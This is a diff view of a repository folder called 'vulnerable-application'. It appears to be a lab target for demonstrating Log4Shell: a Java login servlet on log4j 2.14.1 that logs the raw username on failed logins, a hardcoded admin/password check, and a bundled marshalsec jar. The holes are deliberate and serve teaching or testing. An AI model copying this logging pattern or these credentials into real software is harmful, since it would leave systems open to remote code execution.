<item class="javax.swing.JScrollBar" icon="/com/intellij/uiDesigner/icons/scrollbar.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="6" hsize-policy="0" anchor="0" fill="2" />
</item>
</group>
</component>
</project>

6
vulnerable-application/.idea/vcs.xml
Unescape View File

@ -0,0 +1,6 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="VcsDirectoryMappings">
<mapping directory="$PROJECT_DIR$" vcs="Git" />
</component>
</project>

0
vulnerable-application/cible/.gitkeep
Unescape View File

BIN
vulnerable-application/cible/log4shell-1.0-SNAPSHOT.war
View File

Binary file not shown.

BIN
vulnerable-application/cible/marshalsec-0.0.3-SNAPSHOT-all.jar
View File

Binary file not shown.

41
vulnerable-application/log4shell.iml
Unescape View File

@ -0,0 +1,41 @@
<?xml version="1.0" encoding="UTF-8"?>
<module org.jetbrains.idea.maven.project.MavenProjectsManager.isMavenModule="true" type="JAVA_MODULE" version="4">
<component name="FacetManager">
<facet type="web" name="Web">
<configuration>
<descriptors>
<deploymentDescriptor name="web.xml" url="file://$MODULE_DIR$/src/main/webapp/WEB-INF/web.xml" />
</descriptors>
<webroots>
<root url="file://$MODULE_DIR$/src/main/webapp" relative="/" />
</webroots>
<sourceRoots>
<root url="file://$MODULE_DIR$/src/main/java" />
<root url="file://$MODULE_DIR$/src/main/resources" />
</sourceRoots>
</configuration>
</facet>
</component>
<component name="NewModuleRootManager" LANGUAGE_LEVEL="JDK_1_8">
<output url="file://$MODULE_DIR$/target/classes" />
<output-test url="file://$MODULE_DIR$/target/test-classes" />
<content url="file://$MODULE_DIR$">
<sourceFolder url="file://$MODULE_DIR$/src/main/java" isTestSource="false" />
<sourceFolder url="file://$MODULE_DIR$/src/main/resources" type="java-resource" />
<sourceFolder url="file://$MODULE_DIR$/src/test/java" isTestSource="true" />
<sourceFolder url="file://$MODULE_DIR$/src/test/resources" type="java-test-resource" />
<excludeFolder url="file://$MODULE_DIR$/target" />
</content>
<orderEntry type="inheritedJdk" />
<orderEntry type="sourceFolder" forTests="false" />
<orderEntry type="library" scope="PROVIDED" name="Maven: javax.servlet:javax.servlet-api:4.0.1" level="project" />
<orderEntry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter-api:5.7.1" level="project" />
<orderEntry type="library" scope="TEST" name="Maven: org.apiguardian:apiguardian-api:1.1.0" level="project" />
<orderEntry type="library" scope="TEST" name="Maven: org.opentest4j:opentest4j:1.2.0" level="project" />
<orderEntry type="library" scope="TEST" name="Maven: org.junit.platform:junit-platform-commons:1.7.1" level="project" />
<orderEntry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter-engine:5.7.1" level="project" />
<orderEntry type="library" scope="TEST" name="Maven: org.junit.platform:junit-platform-engine:1.7.1" level="project" />
<orderEntry type="library" name="Maven: org.apache.logging.log4j:log4j-core:2.14.1" level="project" />
<orderEntry type="library" name="Maven: org.apache.logging.log4j:log4j-api:2.14.1" level="project" />
</component>
</module>

66
vulnerable-application/pom.xml
Unescape View File

@ -0,0 +1,66 @@
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>com.example</groupId>
<artifactId>log4shell</artifactId>
<version>1.0-SNAPSHOT</version>
<name>log4shell</name>
<packaging>war</packaging>
<properties>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
<maven.compiler.target>1.8</maven.compiler.target>
<maven.compiler.source>1.8</maven.compiler.source>
<junit.version>5.7.1</junit.version>
</properties>
<dependencies>
<dependency>
<groupId>javax.servlet</groupId>
<artifactId>javax.servlet-api</artifactId>
<version>4.0.1</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.junit.jupiter</groupId>
<artifactId>junit-jupiter-api</artifactId>
<version>${junit.version}</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.junit.jupiter</groupId>
<artifactId>junit-jupiter-engine</artifactId>
<version>${junit.version}</version>
<scope>test</scope>
</dependency>
<!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.1</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api -->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.14.1</version>
</dependency>
</dependencies>
<build>
<plugins>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-war-plugin</artifactId>
<version>3.3.1</version>
</plugin>
</plugins>
</build>
</project>

39
vulnerable-application/src/main/java/com/example/log4shell/LoginServlet.java
Unescape View File

@ -0,0 +1,39 @@
package com.example.log4shell;
import java.io.*;
import javax.servlet.ServletException;
import javax.servlet.http.*;
import javax.servlet.annotation.*;
import com.sun.deploy.net.HttpRequest;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
@WebServlet(name = "loginServlet", value = "/login")
public class LoginServlet extends HttpServlet {
@Override
protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
String userName = req.getParameter("uname");
String password = req.getParameter("password");
resp.setContentType("text/html");
PrintWriter out = resp.getWriter();
out.println("<html><body>");
if(userName.equals("admin") && password.equals("password")){
out.println("Welcome Back Admin");
}
else{
Logger logger = LogManager.getLogger(com.example.log4shell.log4j.class);
logger.error(userName);
out.println("<code> the password you entered was invalid, <u> we will log your information </u> </code>");
}
}
public void destroy() {
}
}

9
vulnerable-application/src/main/java/com/example/log4shell/log4j.java
Unescape View File

@ -0,0 +1,9 @@
package com.example.log4shell;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class log4j {
private static final Logger logger = LogManager.getLogger(log4j.class);
}

6
vulnerable-application/src/main/webapp/WEB-INF/web.xml
Unescape View File

@ -0,0 +1,6 @@
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0">
</web-app>

40
vulnerable-application/src/main/webapp/index.jsp
Unescape View File

@ -0,0 +1,40 @@
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="https://unpkg.com/tailwindcss@2.2.4/dist/tailwind.min.css" rel="stylesheet">
</head>
<body>
<div class="h-screen flex">
<div class="flex w-1/2 bg-gradient-to-tr from-blue-800 to-purple-700 i justify-around items-center">
<div>
<h1 class="text-white font-bold text-4xl font-sans">GoFinance</h1>
<p class="text-white mt-1">The most popular peer to peer lending at SEA</p>
<button type="submit" class="block w-28 bg-white text-indigo-800 mt-4 py-2 rounded-2xl font-bold mb-2">Read More</button>
</div>
</div>
<div class="flex w-1/2 justify-center items-center bg-white">
<form class="bg-white" method="POST" action="/login">
<h1 class="text-gray-800 font-bold text-2xl mb-1">Hello Again!</h1>
<p class="text-sm font-normal text-gray-600 mb-7">Welcome Back</p>
<div class="flex items-center border-2 py-2 px-3 rounded-2xl mb-4">
<svg xmlns="http://www.w3.org/2000/svg" class="h-5 w-5 text-gray-400" fill="none" viewBox="0 0 24 24" stroke="currentColor">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M16 12a4 4 0 10-8 0 4 4 0 008 0zm0 0v1.5a2.5 2.5 0 005 0V12a9 9 0 10-9 9m4.5-1.206a8.959 8.959 0 01-4.5 1.207" />
</svg>
<input class="pl-2 outline-none border-none" type="text" name="uname" placeholder="Username" />
</div>
<div class="flex items-center border-2 py-2 px-3 rounded-2xl">
<svg xmlns="http://www.w3.org/2000/svg" class="h-5 w-5 text-gray-400" viewBox="0 0 20 20" fill="currentColor">
<path fill-rule="evenodd" d="M5 9V7a5 5 0 0110 0v2a2 2 0 012 2v5a2 2 0 01-2 2H5a2 2 0 01-2-2v-5a2 2 0 012-2zm8-2v2H7V7a3 3 0 016 0z" clip-rule="evenodd" />
</svg>
<input class="pl-2 outline-none border-none" type="text" name="password" placeholder="Password" />
</div>
<button type="submit" class="block w-full bg-indigo-600 mt-4 py-2 rounded-2xl text-white font-semibold mb-2">Login</button>
<span class="text-sm ml-2 hover:text-blue-500 cursor-pointer">Forgot Password ?</span>
</form>
</div>
</div>
</body>
</html>
Write Preview
Loading…
Cancel
Save